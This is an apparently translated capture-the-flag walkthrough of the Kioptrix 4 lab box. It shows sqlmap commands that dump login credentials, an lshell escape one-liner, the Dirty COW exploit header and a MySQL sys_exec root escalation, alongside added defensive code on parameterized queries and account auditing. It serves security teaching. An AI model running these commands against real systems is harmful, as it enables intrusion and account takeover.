1. Host discovery
Using netdiscover, the target's IP turns out to be 192.168.203.136.
2. Port scanning
root@kali:~# nmap -sV -A 192.168.203.136 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:43 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.136
Host is up (0.00050s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.136:80/
| Form id: myusername
| Form action: checklogin.php
|
| Path: http://192.168.203.136:80/checklogin.php
| Form id:
| Form action: index.php
|
| Path: http://192.168.203.136:80/index.php
| Form id: myusername
|_ Form action: checklogin.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /database.sql: Possible database backup
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.8:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-2011-3192 7.8 https://vulners.com/cve/CVE-2011-3192
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2011-3368 5.0 https://vulners.com/cve/CVE-2011-3368
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2008-2364 5.0 https://vulners.com/cve/CVE-2008-2364
| CVE-2007-6750 5.0 https://vulners.com/cve/CVE-2007-6750
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| CVE-2011-3607 4.4 https://vulners.com/cve/CVE-2011-3607
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2011-4317 4.3 https://vulners.com/cve/CVE-2011-4317
| CVE-2011-3639 4.3 https://vulners.com/cve/CVE-2011-3639
| CVE-2011-3348 4.3 https://vulners.com/cve/CVE-2011-3348
| CVE-2011-0419 4.3 https://vulners.com/cve/CVE-2011-0419
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ CVE-2011-4415 1.2 https://vulners.com/cve/CVE-2011-4415
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:30:77:6D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.203.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.54 seconds
The target has ports 22, 80, 139 and 445 open, and the scan also turned up a database.sql file, probably a database backup.
3. Finding vulnerabilities
We start by taking a look at the web service:
No hurry, though; first let's look at the database.sql we just found.
It gives us a username and password, but they do not allow us to log in.
So we take another approach. The hint for this box is that there is SQL injection, so the obvious place to try is the login form.
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword --dbs
Sure enough, it is injectable:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members --tables
-------------------------------------------------------------------------
Database: members
[1 table]
+---------+
| members |
+---------+
Next we look at the members table; when enumerating this table, sqlmap relies on blind injection:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members --columns
---------------------------------------------------------------------------
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
Next we dump the contents of those columns:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members -C username,password --dump
-----------------------------------------------------------------------
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password |
+----------+-----------------------+
| robert | ADGAdsafdfwt4gadfga== |
| john | MyNameIsJohn |
+----------+-----------------------+
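The login form above is injectable because the POST fields end up spliced into the SQL text. The PHP that builds the query is not on this page, so the vulnerable function below is an assumption about that classic concatenation pattern; it is an added example, not code from the box or from the original write-up. It uses sqlite3 in place of MySQL so it runs offline, with a constructed copy of the members table (same columns as the sqlmap output, placeholder values), and puts the parameterized version beside it.

```python
"""
Added example (not from the original walkthrough): why a concatenated
login query is injectable, and the prepared-statement form that fixes it.

The vulnerable pattern is an assumption about checklogin.php; its source
is not on the page.  sqlite3 stands in for MySQL so the script runs offline.
"""
import sqlite3


def make_db():
    """Constructed in-memory copy of the members table.  Columns follow the
    sqlmap --columns output; the row values are placeholders, not the box's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [(1, "robert", "placeholder-secret-1"), (2, "john", "placeholder-secret-2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Assumed vulnerable pattern: user input spliced into the SQL string,
    so any quote in the input changes the structure of the query."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        # A lone quote breaks the statement.  This error behaviour is what
        # scanners look for when they test a form for injection.
        return "sql-error"
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened form: bound parameters keep the input as data, never as SQL."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the same inputs through both versions and return the outcomes."""
    conn = make_db()
    tautology = "' OR '1'='1"
    return {
        "vuln_quote_probe": login_vulnerable(conn, "x", "'"),
        "vuln_tautology": login_vulnerable(conn, "x", tautology),
        "safe_quote_probe": login_parameterized(conn, "x", "'"),
        "safe_tautology": login_parameterized(conn, "x", tautology),
        "safe_valid": login_parameterized(conn, "john", "placeholder-secret-2"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The concatenated version errors on a single quote and accepts the textbook tautology as a valid login; the parameterized version returns no row for either and only matches a real credential pair. Parameterization is the fix for the injection itself; the page later shows checklogin.php connecting as the MySQL root user with an empty password, and a dedicated low-privilege database account is what would stop an injection in this form from growing into the privilege escalation described below.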
4. Logging in over SSH
We try to connect over SSH with the credentials we obtained.
Using the robert account, the login succeeds, but once in we find that nothing can be executed: the shell is restricted, and it is not rbash. Searching online for the characteristics, it looks like lshell.
Here we can use the following command to bypass it:
echo os.system('/bin/bash')
Switching to the /root directory, we see that lshell is present, which confirms the guess:
An article on lshell: https://blog.csdn.net/savior141/article/details/71305002
I found it odd that, before escalating privileges at all, I could already enter the /root directory and even read the flag:
5. Privilege escalation
Checking the Linux kernel, Dirty COW can be used for privilege escalation:
robert@Kioptrix4:/root$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
robert@Kioptrix4:/root$ getconf LONG_BIT
32
Affected range:
Linux kernel >= 2.6.22 (released in 2007, not fixed until 18 October 2016)
Using searchsploit, we find the privilege-escalation exploit:
searchsploit dirty -m exploits/linux/local/40839.c
---------------------------------------------------------------
root@kali:~# cat 40839.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
But every time I tried to download the exploit onto the target with wget, it failed; probably a firewall restriction.
I have not yet come up with a clean solution. Here is an article on Dirty COW privilege escalation: https://www.jianshu.com/p/df72d1ee1e3e
The real focus of this box is actually MySQL privilege escalation:
In the web root we found the file that records the database username and password:
robert@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
As we can see, we can log in without any password.
MySQL privilege escalation
select sys_exec("usermod -aG admin robert") // add robert directly to the admin group
robert@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6545
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec("usermod -aG admin robert");
+--------------------------------------+
| sys_exec("usermod -aG admin robert") |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.00 sec)
Then exit MySQL:
robert@Kioptrix4:/var/www$ sudo su root
[sudo] password for robert:
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
Privilege escalation successful!
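Both escalation routes on this page leave a trace in the local account databases: the 40839.c header quoted above says it rewrites the root line of /etc/passwd with a new UID-0 user (default "firefart") and backs the original up to /tmp/passwd.bak, and the MySQL route runs `usermod -aG admin robert`, after which `sudo su root` works because the admin group grants sudo on this Ubuntu release. The following is an added defender-side check, not part of the original walkthrough: it parses passwd- and group-format text, flags any UID-0 account other than root, a missing root entry, and new members of sudo-granting groups. The sample file contents are constructed for the example, and the privileged-group list and baseline are assumptions.

```python
"""
Added example (not from the original walkthrough): audit /etc/passwd and
/etc/group for the two changes the escalations on this box produce, namely
a replaced root line (Dirty COW exploit default "firefart") and a user
added to a sudo-granting group (usermod -aG admin robert).
"""

# Assumption: groups that grant sudo on typical distributions.
PRIVILEGED_GROUPS = {"admin", "sudo", "wheel"}


def parse_passwd(text):
    """Return a list of (name, uid) pairs from passwd-format text."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed line; skip rather than guess
        users.append((fields[0], int(fields[2])))
    return users


def parse_group(text):
    """Return a dict of group name -> set of supplementary members."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        groups[fields[0]] = {m for m in fields[3].split(",") if m}
    return groups


def audit(passwd_text, group_text, baseline_privileged):
    """Return a sorted list of findings; an empty list means nothing unusual."""
    findings = []

    uid0 = [name for name, uid in parse_passwd(passwd_text) if uid == 0]
    for name in uid0:
        if name != "root":
            findings.append(f"uid 0 account other than root: {name}")
    if "root" not in uid0:
        findings.append("root account missing or renamed in passwd")

    groups = parse_group(group_text)
    for grp in sorted(PRIVILEGED_GROUPS & groups.keys()):
        added = groups[grp] - baseline_privileged.get(grp, set())
        for member in sorted(added):
            findings.append(f"new member of privileged group {grp}: {member}")

    return sorted(findings)


# Constructed sample files for the demo (not copied from the box): root's
# line has been replaced by a "firefart" UID-0 entry, and robert has been
# added to the admin group.
SAMPLE_PASSWD = """\
firefart:x:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
robert:x:1001:1001:Robert,,,:/home/robert:/usr/local/bin/lshell
john:x:1002:1002:John,,,:/home/john:/usr/local/bin/lshell
"""

SAMPLE_GROUP = """\
root:x:0:
admin:x:119:robert
users:x:100:
"""

# Assumption: the baseline snapshot had no members in the admin group.
BASELINE = {"admin": set()}


def demo():
    """Audit the constructed samples against the assumed baseline."""
    return audit(SAMPLE_PASSWD, SAMPLE_GROUP, BASELINE)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host the baseline would be a snapshot of the privileged groups taken at build time, and the check would run against /etc/passwd and /etc/group from a periodic job or a file-integrity monitor; the exploit's own /tmp/passwd.bak backup is a second artefact worth alerting on.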